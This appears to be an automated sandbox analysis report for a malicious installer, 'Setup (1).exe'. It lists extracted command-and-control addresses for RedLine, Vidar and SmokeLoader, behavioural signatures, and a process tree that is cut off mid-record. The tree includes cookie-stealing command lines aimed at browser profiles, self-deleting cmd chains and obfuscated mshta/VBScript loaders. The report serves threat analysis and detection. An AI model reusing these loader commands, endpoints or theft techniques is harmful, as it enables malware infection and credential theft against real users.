Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1195s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 08:18

General

  • Target

    Setup (1).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 11 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 15 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 36 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 51 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2728
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2712
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies registry class
          PID:5224
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\hdwsube
                        C:\Users\Admin\AppData\Roaming\hdwsube
                        2⤵
                          PID:8568
                        • C:\Users\Admin\AppData\Roaming\vwwsube
                          C:\Users\Admin\AppData\Roaming\vwwsube
                          2⤵
                            PID:2676
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:296
                          • C:\Users\Admin\AppData\Local\Temp\Setup (1).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"
                            1⤵
                            • Checks computer location settings
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:364
                            • C:\Users\Admin\Documents\K5sgF0v_ErVIozEsq_DRyfCo.exe
                              "C:\Users\Admin\Documents\K5sgF0v_ErVIozEsq_DRyfCo.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3712
                              • C:\Users\Admin\Documents\K5sgF0v_ErVIozEsq_DRyfCo.exe
                                "C:\Users\Admin\Documents\K5sgF0v_ErVIozEsq_DRyfCo.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4264
                            • C:\Users\Admin\Documents\gqsFXXx7yuPqVPf3B0SVetXc.exe
                              "C:\Users\Admin\Documents\gqsFXXx7yuPqVPf3B0SVetXc.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2188
                              • C:\Users\Admin\Documents\gqsFXXx7yuPqVPf3B0SVetXc.exe
                                C:\Users\Admin\Documents\gqsFXXx7yuPqVPf3B0SVetXc.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4568
                            • C:\Users\Admin\Documents\yAOxl2XrnP5eHy_cCcB_wRag.exe
                              "C:\Users\Admin\Documents\yAOxl2XrnP5eHy_cCcB_wRag.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:472
                              • C:\Users\Admin\AppData\Local\Temp\ssqq.exe
                                "C:\Users\Admin\AppData\Local\Temp\ssqq.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2276
                            • C:\Users\Admin\Documents\CPR_Ch0fPmPt3kMe3nlZ_C8l.exe
                              "C:\Users\Admin\Documents\CPR_Ch0fPmPt3kMe3nlZ_C8l.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3668
                            • C:\Users\Admin\Documents\quJoLjZeQD8XCUuQlStRoD1b.exe
                              "C:\Users\Admin\Documents\quJoLjZeQD8XCUuQlStRoD1b.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:3736
                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Drops file in Program Files directory
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5064
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:5100
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:1136
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:284
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:5116
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops startup file
                                  PID:5044
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5432
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5508
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5180
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1836
                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:6024
                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1000
                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:5596
                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                      4⤵
                                        PID:6172
                                  • C:\Users\Admin\Documents\XNIbepr2K9Gn2wElfYQeGfeg.exe
                                    "C:\Users\Admin\Documents\XNIbepr2K9Gn2wElfYQeGfeg.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3768
                                  • C:\Users\Admin\Documents\U8gT_JJYdnWHGtBfkraVU7Pj.exe
                                    "C:\Users\Admin\Documents\U8gT_JJYdnWHGtBfkraVU7Pj.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1160
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 388
                                      3⤵
                                      • Program crash
                                      PID:3468
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 368
                                      3⤵
                                      • Program crash
                                      PID:4448
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 404
                                      3⤵
                                      • Program crash
                                      PID:2376
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 588
                                      3⤵
                                      • Program crash
                                      PID:4184
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 668
                                      3⤵
                                      • Program crash
                                      PID:5456
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 676
                                      3⤵
                                      • Program crash
                                      PID:5648
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 680
                                      3⤵
                                      • Program crash
                                      PID:5840
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 752
                                      3⤵
                                      • Program crash
                                      PID:6068
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 636
                                      3⤵
                                      • Program crash
                                      PID:6536
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 840
                                      3⤵
                                      • Program crash
                                      PID:8040
                                    • C:\Users\Admin\Documents\U8gT_JJYdnWHGtBfkraVU7Pj.exe
                                      "C:\Users\Admin\Documents\U8gT_JJYdnWHGtBfkraVU7Pj.exe"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:8540
                                  • C:\Users\Admin\Documents\JTxqaoTAaMI7zXL6t8i2Ojjl.exe
                                    "C:\Users\Admin\Documents\JTxqaoTAaMI7zXL6t8i2Ojjl.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1140
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "JTxqaoTAaMI7zXL6t8i2Ojjl.exe" /f & erase "C:\Users\Admin\Documents\JTxqaoTAaMI7zXL6t8i2Ojjl.exe" & exit
                                      3⤵
                                        PID:5324
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "JTxqaoTAaMI7zXL6t8i2Ojjl.exe" /f
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5720
                                    • C:\Users\Admin\Documents\eKZnYQ5aAUkzRxiyRnaZKTaD.exe
                                      "C:\Users\Admin\Documents\eKZnYQ5aAUkzRxiyRnaZKTaD.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1144
                                    • C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe
                                      "C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe"
                                      2⤵
                                        PID:1836
                                        • C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe
                                          "C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4532
                                        • C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe
                                          "C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3000
                                        • C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe
                                          "C:\Users\Admin\Documents\NMaUV3t24YKP4Mc_klO_vCHQ.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4028
                                      • C:\Users\Admin\Documents\nUuH24Z5Hcb4RJYqoOQ43eDF.exe
                                        "C:\Users\Admin\Documents\nUuH24Z5Hcb4RJYqoOQ43eDF.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:2248
                                      • C:\Users\Admin\Documents\tXCeRzoQlFJdT95p7tl4df1N.exe
                                        "C:\Users\Admin\Documents\tXCeRzoQlFJdT95p7tl4df1N.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3188
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im tXCeRzoQlFJdT95p7tl4df1N.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tXCeRzoQlFJdT95p7tl4df1N.exe" & del C:\ProgramData\*.dll & exit
                                          3⤵
                                            PID:5760
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im tXCeRzoQlFJdT95p7tl4df1N.exe /f
                                              4⤵
                                              • Kills process with taskkill
                                              PID:5680
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 6
                                              4⤵
                                              • Delays execution with timeout.exe
                                              PID:7464
                                        • C:\Users\Admin\Documents\y8otP4KYQIWjLuaXtOirsh7L.exe
                                          "C:\Users\Admin\Documents\y8otP4KYQIWjLuaXtOirsh7L.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3828
                                        • C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe
                                          "C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe"
                                          2⤵
                                            PID:3840
                                            • C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe
                                              C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4548
                                            • C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe
                                              C:\Users\Admin\Documents\U93M964QO2U4fySGLxelKfhh.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4648
                                          • C:\Users\Admin\Documents\5ftHkIcqWZvgjWE2y2vZmyVt.exe
                                            "C:\Users\Admin\Documents\5ftHkIcqWZvgjWE2y2vZmyVt.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3852
                                            • C:\Users\Admin\AppData\Roaming\5744656.exe
                                              "C:\Users\Admin\AppData\Roaming\5744656.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4772
                                            • C:\Users\Admin\AppData\Roaming\8721201.exe
                                              "C:\Users\Admin\AppData\Roaming\8721201.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3328
                                            • C:\Users\Admin\AppData\Roaming\5545414.exe
                                              "C:\Users\Admin\AppData\Roaming\5545414.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4820
                                            • C:\Users\Admin\AppData\Roaming\8581422.exe
                                              "C:\Users\Admin\AppData\Roaming\8581422.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:2680
                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:2764
                                          • C:\Users\Admin\Documents\dIpV9AqoiJ76MGTp8ouLNWVN.exe
                                            "C:\Users\Admin\Documents\dIpV9AqoiJ76MGTp8ouLNWVN.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2740
                                          • C:\Users\Admin\Documents\VsdHpD_X_suCpjizH1fuvfvT.exe
                                            "C:\Users\Admin\Documents\VsdHpD_X_suCpjizH1fuvfvT.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Adds Run key to start application
                                            • Drops file in System32 directory
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3556
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F9KLFEg0Su.bat"
                                              3⤵
                                                PID:6428
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  4⤵
                                                    PID:6080
                                                  • C:\Windows\system32\w32tm.exe
                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    4⤵
                                                      PID:8828
                                                    • C:\Users\Admin\Documents\UnblockSave\cbXM59eGxT7jDtiNT7ESqv8S.exe
                                                      "C:\Users\Admin\Documents\UnblockSave\cbXM59eGxT7jDtiNT7ESqv8S.exe"
                                                      4⤵
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:364
                                                • C:\Users\Admin\Documents\SfPhg0s_OiLUo4y8WBRLfv20.exe
                                                  "C:\Users\Admin\Documents\SfPhg0s_OiLUo4y8WBRLfv20.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1444
                                                • C:\Users\Admin\Documents\cbXM59eGxT7jDtiNT7ESqv8S.exe
                                                  "C:\Users\Admin\Documents\cbXM59eGxT7jDtiNT7ESqv8S.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:2984
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 660
                                                    3⤵
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4952
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 680
                                                    3⤵
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4324
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 712
                                                    3⤵
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4488
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 684
                                                    3⤵
                                                    • Program crash
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3880
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1076
                                                    3⤵
                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                    • Program crash
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4620
                                                • C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe
                                                  "C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe"
                                                  2⤵
                                                    PID:1304
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                      3⤵
                                                        PID:4500
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\XOd1WaOvuW6ilp3HB66v4806.exe" ) do taskkill -IM "%~nXW" -f
                                                          4⤵
                                                            PID:4300
                                                            • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                              WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:3700
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                6⤵
                                                                  PID:5308
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                    7⤵
